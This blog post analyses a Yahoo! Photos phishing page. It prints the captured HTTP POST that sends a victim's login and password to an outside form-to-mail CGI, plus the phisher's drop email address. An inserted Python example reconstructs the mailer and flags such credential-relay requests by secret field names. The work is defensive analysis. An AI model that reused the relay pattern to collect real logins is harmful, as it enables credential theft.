This post is an update to yesterday’s post,
which reports a newly spotted Yahoo! Photos phishing site. If
you haven’t read it yet, I suggest that you read it before
continuing with this post.
As mentioned in the title, this is an analysis of that
Yahoo! Photos phish, with emphasis on how the credentials are
stolen and where the stolen credentials ultimately end up.
The Yahoo! Photos phish (henceforth simply the “phish”)
contains a form consisting of two text input boxes (the
Yahoo! ID and Password boxes), a checkbox, and a submit button. A
portion of the form is composed of the following HTML code.
The encoded strings are equivalent to the following
When the “Sign In” button is clicked, the phish does an HTTP POST
to a mailto.cgi, presumed to be a form-to-mail CGI. This CGI
sits on a server somewhere in Japan.
The variables are remarkably similar to those of the phish (also a
Yahoo! phish) discussed in this article:
/?p=38
As a test, I saved a local copy of the phish and modified the
“Mail_To” variable, replacing it with my “spambox” email address;
let’s pretend that that email address is
“spambox@somewhere.com”.
Then I put “username” in the Yahoo! ID field and “password” in
the Password field, and clicked the “Sign In” button.
My packet log (courtesy of Ethereal) showed the following (text
wraps):
POST http://www2.fiberbit.net/form/mailto.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Content-Type: application/x-www-form-urlencoded
Content-length: 168
Host: www2.fiberbit.net
Proxy-Connection: Keep-Alive

Mail_From=Yahoo&Mail_To=spambox@somewhere.com&Mail_Subject=Yahoo+id&Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=username&passwd=password&.save=Sign+In
As can be seen above, the phish POSTed the following
variables:
Mail_From=Yahoo
Mail_To=spambox@somewhere.com
Mail_Subject=Yahoo+id
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos
login=username
passwd=password
.save=Sign+In
Take note of the “login” and “passwd” variable. Sweet.
The mailto.cgi, after receiving the HTTP POST, returns an HTTP 302
status code, meaning that the target page has “moved temporarily”
and that the browser will be redirected to the page specified
in the Location header of the response.
HTTP/1.1 302 Found
Connection: close
Proxy-Connection: close
Date: Wed, 30 Nov 2005 06:18:44 GMT
Location: http://photos.yahoo.com/ph//my_photos
Content-Type: text/html; charset=iso-8859-1
Server: Apache/1.3.26 (Unix) mod_perl/1.26

302 Found
The document has moved <a href="http://photos.yahoo.com/ph//my_photos">here</a>.
So, after clicking the “Sign In” button, the user is redirected
to http://photos.yahoo.com/ph//my_photos, which is the
value of the “Next_Page” variable. Because the victim lands on the
legitimate Yahoo! Photos page right after “signing in”, nothing
looks wrong, and the phish passes for the proper Yahoo! Photos site.
But what happened to the other variables?
Apparently the mailto.cgi, which is presumed to be a form-to-mail CGI,
mailed all of that information to the email address specified in the
“Mail_To” variable. Checking my spambox@somewhere.com mailbox, I
found this email.
The Yahoo! ID and the password can be clearly seen. However, most
of the email text is in Japanese, so I don’t know what the rest of
the email says. :)
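To tie the capture together, here is an added example (not code from the original post, and not the real mailto.cgi, whose source was never seen) that parses the POST from the packet log above, reconstructs what an unvalidated form-to-mail script must be doing with it (mail every leftover field to the client-supplied Mail_To, then 302 the browser to the client-supplied Next_Page), and flags requests with that shape. The field names and URLs are the ones from the capture; the BENIGN_POST contact form and the simulate_mailer() behaviour are assumptions made for the example.

```python
from email.message import EmailMessage
from urllib.parse import parse_qs, urlsplit

# The request from the packet log above (Accept/User-Agent headers dropped,
# the author's spambox address kept). Content-length is omitted so the
# sample does not have to match an exact byte count.
CAPTURED_POST = (
    "POST http://www2.fiberbit.net/form/mailto.cgi HTTP/1.1\r\n"
    "Host: www2.fiberbit.net\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "Mail_From=Yahoo&Mail_To=spambox@somewhere.com&Mail_Subject=Yahoo+id&"
    "Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos"
    "&login=username&passwd=password&.save=Sign+In"
)

# Constructed (not from the post): a legitimate contact form using the same
# mailer, whose "thank you" page lives on the mailer's own host.
BENIGN_POST = (
    "POST http://www2.fiberbit.net/form/mailto.cgi HTTP/1.1\r\n"
    "Host: www2.fiberbit.net\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "Mail_From=Contact&Mail_To=webmaster@example.jp&Mail_Subject=Feedback&"
    "Next_Page=http%3A%2F%2Fwww2.fiberbit.net%2Fform%2Fthanks.html&"
    "name=Taro&message=Nice+site"
)

# Fields the mailer consumes itself; everything else ends up in the mail body.
MAILER_CONTROL = ("Mail_From", "Mail_To", "Mail_Subject", "Next_Page")
# Field names that usually carry a secret (matched case-insensitively).
SECRET_FIELDS = ("passwd", "password", "pass", "pwd", "pin")


def parse_request(raw):
    """Split a raw HTTP request into (method, url, headers, form).

    parse_qs undoes both '+' -> ' ' and %XX escapes, so 'Yahoo+id' comes
    back as 'Yahoo id' and the Next_Page URL comes back intact.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, url, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return method, url, headers, form


def simulate_mailer(form):
    """Assumed reconstruction of what an unvalidated mailto.cgi does.

    The real CGI was never inspected; this reproduces only what the capture
    shows: every non-control field is mailed to the client-chosen Mail_To,
    and the client-chosen Next_Page becomes the 302 Location. Returns the
    (EmailMessage, raw HTTP response) pair.
    """
    msg = EmailMessage()
    msg["From"] = form.get("Mail_From", "")
    msg["To"] = form["Mail_To"]
    msg["Subject"] = form.get("Mail_Subject", "")
    msg.set_content("\n".join(
        f"{name}: {value}" for name, value in form.items()
        if name not in MAILER_CONTROL
    ))
    response = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {form['Next_Page']}\r\n"
        "Content-Type: text/html; charset=iso-8859-1\r\n"
        "\r\n"
    )
    return msg, response


def is_credential_relay(raw):
    """Flag a POST that (a) carries a secret field, (b) lets the client pick
    the mail destination, and (c) bounces the user to a different host than
    the one that received the secret. All three hold for the Yahoo! phish;
    an ordinary contact form fails (a) and (c)."""
    method, _url, headers, form = parse_request(raw)
    if method != "POST":
        return False
    has_secret = any(name.lower() in SECRET_FIELDS for name in form)
    client_picks_sink = "Mail_To" in form
    next_host = urlsplit(form.get("Next_Page", "")).hostname
    leaves_host = next_host is not None and next_host != headers.get("host")
    return has_secret and client_picks_sink and leaves_host


if __name__ == "__main__":
    _, _, _, form = parse_request(CAPTURED_POST)
    msg, response = simulate_mailer(form)
    print(msg)        # the mail that lands in the Mail_To inbox
    print(response)   # the redirect the victim's browser follows
    print(is_credential_relay(CAPTURED_POST), is_credential_relay(BENIGN_POST))
```

The third check in is_credential_relay() is the one worth keeping in a proxy or IDS rule: a password field POSTed to one host with a redirect to another is exactly the open-mailer-plus-open-redirect pattern this kit relies on, and the mailer's operator could close it by refusing any Mail_To or Next_Page that is not on an allow-list.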
Old-time readers will probably notice that the methodology used in
this testing is similar to the one used in this post.
This is not at all surprising, since there is uncanny similarity in
the structure of both phishing sites. This particular phish sends
the stolen credentials to this email address:
oxox0o_angel_oxox0o@yahoo.com
As mentioned in yesterday’s post, this indicates that there is a
kit available for Yahoo! phishes. The availability of this kit makes
setting up a phishing site much easier.